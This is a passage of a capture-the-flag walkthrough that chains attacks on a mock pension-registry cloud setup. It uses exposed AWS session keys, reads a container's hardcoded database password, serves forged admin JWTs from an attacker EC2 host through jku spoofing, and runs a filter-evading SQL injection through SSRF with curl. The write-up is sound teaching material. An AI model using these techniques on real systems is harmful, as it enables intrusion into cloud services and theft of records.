aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ cat .env
[default]
aws_access_key_id=ASIAZEZM3ZQOVCX7EEF4
aws_secret_access_key=NgAGcf1HnpIAjrNdqv3E7XGXy1D9h5AC5IdfTAxj
aws_session_token=FwoGZXIvYXdzENH//////////wEaDHejxi0VSza/b+hi/yKrAYDc6cpf8NeBGGCCXVy6RKbQCvQBVt/OY+97yMxP6oKaMpQWMM4L7vxB3KlLBFLkVM5TEbXZutQrmmGQlFQV1nRSHHk902qTgRGFvewf8yoFfAKKEZZbyxWi0I8eRiaDt1Db6G6W2FyBjEqVR0bZV3DrJefEQ1LJDCNTWU1a3uy2pWu813s4hu09o3RKIAfxuXhh09zr5dK3cJ0UH0gS85Oar2qSIETW0t/NNSjF+MH+BTItGrwf4r3UciOrx8c0eXEP5AascpUy6c/jP5DRa62+tVI2uUirQz6I8OfyPKSu

$ python3 weirdAAL.py -m recon_all -t cross-account-ec2-access
Account Id: 341301470318
ASIAZEZM3ZQOVCX7EEF4 : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t cross-account-ec2-access
[+] Services enumerated for ASIAZEZM3ZQO4WFMZ3U2 [+]
ec2.DescribeAccountAttributes
ec2.DescribeAddresses
...
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

If we run the aws elbv2 describe-load-balancers command, we can find the npr-cluster-alb deployed for the National Pension Registry application.

$ aws elbv2 describe-load-balancers --profile cross-account-ec2-access
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:628769934365:loadbalancer/app/npr-cluster-alb/96b0036340fbf14d",
            "DNSName": "internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T04:03:22.810Z",
            "LoadBalancerName": "npr-cluster-alb",
            "Scheme": "internal",
            "VpcId": "vpc-0dcb6e571fd026058",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-0814fe411ae20fcc7",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0be4fa2daa74f89dd",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0dc2665a5ee555216"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

Notice that the DNS Name for the ALB starts with internal-, which indicates that the npr-cluster-alb is an internally-accessible ALB.

We can also verify it by querying the A records for the DNS name:

$ dig +short internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com -t A @8.8.8.8
10.1.1.173
10.1.0.170

Which confirms our suspicion. Since the application is only accessible via the internal network, we probably have to leverage the SSRF vulnerability in the Employee Pension Contribution Upload Form application to reach the National Pension Registry application.

We are finally close to getting a flag! It is also likely that we need to exploit additional vulnerabilities in the National Pension Registry application to obtain the flag.

Here’s a quick recap of our progress before we continue on: Attack Path Reachng National Pension Registry

Analysing Docker Image for National Pension Registry

Let’s analyse the Docker image for the National Pension Registry application just like how we did for the Employee Pension Contribution Upload Form application.

$ docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry /bin/bash
root@59e384a24601:/usr/src/app# ls -al
total 72
drwxr-xr-x   1 root root  4096 Nov 29 03:43 .
drwxr-xr-x   1 root root  4096 Nov 19 01:41 ..
-rw-r--r--   1 root root  5587 Nov 28 19:41 index.js
drwxr-xr-x 120 root root  4096 Nov 19 01:41 node_modules
-rw-r--r--   1 root root 41347 Nov 16 17:56 package-lock.json
-rw-r--r--   1 root root   490 Nov 16 17:56 package.json
drwxr-xr-x   2 root root  4096 Nov 29 03:43 prod-keys
root@59e384a24601:/usr/src/app# ls -al prod-keys
total 16
drwxr-xr-x 2 root root 4096 Nov 29 03:43 .
drwxr-xr-x 1 root root 4096 Nov 29 03:43 ..
-rw-r--r-- 1 root root 1674 Nov 22 23:12 prod-private-key.pem
-rw-r--r-- 1 root root  558 Nov 22 23:12 prod-public-keys.json

The source code for /usr/src/app/index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
const { Sequelize } = require('sequelize');
const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const jku_link = "http://127.0.0.1:8333/prod-public-keys.json";
const sequelize = new Sequelize('postgres://npr-rds-read-only:e8CSsKdk1s2pRQ3b@national-pension-registry.cdfsuhqgjz6k.ap-southeast-1.rds.amazonaws.com:5432/national_pension_records');
const express = require('express');
const bodyParser = require('body-parser');
const ipRangeCheck = require("ip-range-check");
const url = require('url');
const app = express();
const whitelistedIPRanges = ["127.0.0.1/32","15.193.2.0/24","15.177.82.0/24","122.248.192.0/18","54.169.0.0/16","54.255.0.0/16","52.95.255.32/28","175.41.128.0/18","13.250.0.0/15","64.252.102.0/24","99.77.143.0/24","52.76.128.0/17","64.252.103.0/24","52.74.0.0/16","54.179.0.0/16","52.220.0.0/15","18.142.0.0/15","46.137.192.0/19","46.137.224.0/19","46.51.216.0/21","52.94.248.32/28","54.254.0.0/16","54.151.128.0/17","18.136.0.0/16","13.212.0.0/15","3.5.146.0/23","64.252.104.0/24","18.140.0.0/15","52.95.242.0/24","99.77.161.0/24","3.5.148.0/22","18.138.0.0/15","52.119.205.0/24","52.76.0.0/17","54.251.0.0/16","64.252.105.0/24","3.0.0.0/15","52.77.0.0/16","13.228.0.0/15"];

app.use(bodyParser.urlencoded({ extended: true }));

const authenticateJWT = async(req, res, next) => {
    const authHeader = req.headers.authorization;
    if (authHeader) {
        const authenticationType = authHeader.split(' ')[0];
        const token = authHeader.split(' ')[1];
        if (authenticationType === "Bearer") {
            let usage = req.query.usage;
            let check = await validateUserClaim(usage,token);
            if (check) {
                next();
            }else {
                res.sendStatus(401);
            }
        }else {
            res.sendStatus(401);
        }
    } else {
        res.sendStatus(401);
    }
};

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

async function getSummaryReport(){
    const results = await sequelize.query('select sum(contribution_total) from records.contributions', { type: sequelize.QueryTypes.SELECT });
    return results[0];
}

async function validateUserClaim(usage, rawToken) {
    let payload = await verifyToken(rawToken);
    if (payload != null) {
        // Simple RBAC
        // Only allow Admin to pull the results
        if (usage == "custom-report"){
            if (payload.role == "admin") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "user-report"){
            if (payload.role == "user") {
                return true;
            } else {
                return false;
            }
        }

        if (usage == "summary-report"){
            if (payload.role == "anonymous") {
                return true;
            } else {
                return false;
            }
        }
    }
    return false;
}

async function verifyToken(rawToken) {
    var decodedToken = jwt.decode(rawToken, {complete: true});
    const provided_jku = url.parse(decodedToken.header.jku);
    if (ipRangeCheck(provided_jku.hostname, whitelistedIPRanges)) {
        const client = jwksClient({
            jwksUri: decodedToken.header.jku,
            timeout: 30000, // Defaults to 30s
        });
        const kid = decodedToken.header.kid;
        let publicKey = await client.getSigningKeyAsync(kid).then(key => {
         return key.getPublicKey();
        }, err => {
            return null;
        });
        try {
            let payload = jwt.verify(rawToken, publicKey);
            return payload;
        } catch (err) {
            return null;
        }
    } else {
        return null;
    }
}

function getAuthenticationToken(username,password) {
    // Wait for dev team to update the user account database
    // user account database should be live in Jan 2020
    // Issue only guest user tokens for now
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'guest', role: 'anonymous' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    return token;
}

app.post('/authenticate', (req, res) => {
    // ignore username and password for now
    // issue only guest jwt token for development
    res.json({"token" : getAuthenticationToken(req.body.username, req.body.password)})
});

app.get('/report', authenticateJWT, async (req, res, next) => {
    let message = {
        "message" : "invalid parameters"
    }
    try {f 
        if (req.query.usage == "custom-report") {
            if(!validateUserInputs(req.query.contributor_id)) {
                res.json({"results" : await getCustomReport(req.query.contributor_id)});
            } else {
                res.json(message);
            }
        } else if (req.query.usage == "summary-report") {
            res.json({"results" : await getSummaryReport()});
        } else {
            res.json(message);
        }
        next();
    } catch (e) {
        next(e);
    }
    
});

app.listen(80, () => {
    console.log('National Pension Registry API Server running on port 80!');
});

Like the previous application, there are quite a few obvious issues with the code.
Several observations can be made here:

  • There is SQL injection (SQLi) in getCustomReport() but most special characters are not permitted in the user input
  • It is necessary to present a valid JSON Web Token (JWT) containing the admin role in the JWT payload is permitted to execute custom report
  • There is /authenticate POST endpoint which allows obtaining JSON Web Token (JWT) for anonymous role
  • There is /report GET endpoint authenticating the JWT token which allows executing of the custom report function
  • The JWT token verification fetches the jku (JWK Set URL) header parameter of the token and verifies the JWT token using the public key obtained from the jku URL.
  • The jku URL specified is validated against a predefined allow-list, which appears to be mostly private IPv4 address ranges and AWS IP address ranges.
  • There is also hardcoded credentials for the PostgreSQL Database hosted on Amazon Relational Database Service (Amazon RDS) accessible via internal network

Chaining The Exploits

Hosting Our Webserver on AWS

Since we can control the jku in the JWT header, and the accepted IPv4 ranges include AWS IP address ranges, we can simply host a webserver on an Amazon Elastic Compute Cloud (Amazon EC2) instance serving the required prod-public-keys.json file to pass the validation checks against the predefined allow-list of IPv4 address ranges.

For example, the IPv4 address allocated to the AWS EC2 instance is 3.1.33.7, which resides in the 3.0.0.0/15 subnet permitted.

Signing Our Own JWT Token

Next, we need to sign our own valid JWT token with role set to admin in the JWT payload before we are able to execute a custom report. We can modify the provided National Pension Registry node.js application for the purpose of signing our own JWT tokens and also serving the JWT public key:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
const jwt = require('jsonwebtoken');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const publicKey = fs.readFileSync('prod-keys/prod-public-keys.json');
const PORT = 8080;
const jku_link = `http://3.1.33.7:${PORT}/prod-public-keys.json`;
const express = require('express');
const app = express();

// Sign and return our own JWT token with role set to admin and jku_link pointing to this server
app.get('/authenticate', (req, res) => {
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'admin', role: 'admin' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    res.end(token);
});

// Serve the JWT public key on this endpoint
app.get('/prod-public-keys.json', (req, res) => {
  res.json(JSON.parse(publicKey));
});

app.listen(PORT, () => {
    console.log(`National Pension Registry API Server running on port ${PORT}!`);
});

Afterwards, we install the dependencies for the application and start the server:

$ npm install jsonwebtoken express
$ node server.js
National Pension Registry API Server running on port 8080!

SQL Injection

There is one last hurdle to get past – we also need to perform SQL injection successfully so that we can get the flag.

Let’s start by analysing the regular expression used to validate the user input:

function validateUserInputs(payload){
    // check for special characters
    var format = /[`!@#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

Seems like we are able to use alphanumeric, whitespace, _, ; and . characters.
At this point, we can kind of guess that the flag must be somewhere in the database, and the flag is likely to be one of the records in the same table queried.

Let’s examine the SQL query too:

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

We can see that the injection point is not in a quoted string. Referencing the permitted characters, we can negate the where condition by doing:

SELECT * from records."contributions" where contributor_id = 1 OR null is null

Since null is null is true, this negates the first WHERE condition of contributor_id = 1. Besides that, notice that the function returns the first record returned by the query. Since there is no ORDER BY keyword used in the query, the results are not sorted before being returned. This allows us to fetch the first record in records.contributions table. If the flag is not the first record of the database, we can then further use LIMIT and OFFSET keywords to select a specific record from the table precisely as such.

For example, to select the first record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 0

Or, to select the second record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 1

And so on.

Getting Flag

Recall that the Employee Pension Contribution Upload Form application is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/ and the National Pension Registry is accessible at http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/ in the internal network.

Chaining all the exploits together, we use the SSRF on the Employee Pension Contribution Upload Form application to perform SQL injection on the National Pension Registry backend application by running the following curl command on our AWS EC2 instance:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'endpoint=http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'usage=custom-report' \
    --data-urlencode 'contributor_id=1 or null is null limit 1 offset 0' \
    --data-urlencode "token=$(curl -s http://localhost:8080/authenticate)"
{"results":{"contributor_id":7531,"contributor_name":"govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}","contribution_total":9999}}

Finally, we got the flag govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}!

Complete Attack Path

Wow! You’re still here reading this? Thanks for sitting through this entire lengthly walkthrough!

Here’s an overview of the complete attack path for this challenge in case you are interested: Overview of Attack Path

By now, I think it is pretty evident that performing cloud penetration testing is very arduous and can become messy to the point where it is gets confusing for the tester at some point. :tired_face:

I hope you enjoyed the write-up of this challenge and learnt something new and can better identify and relate to the common cloud and web security issues often found.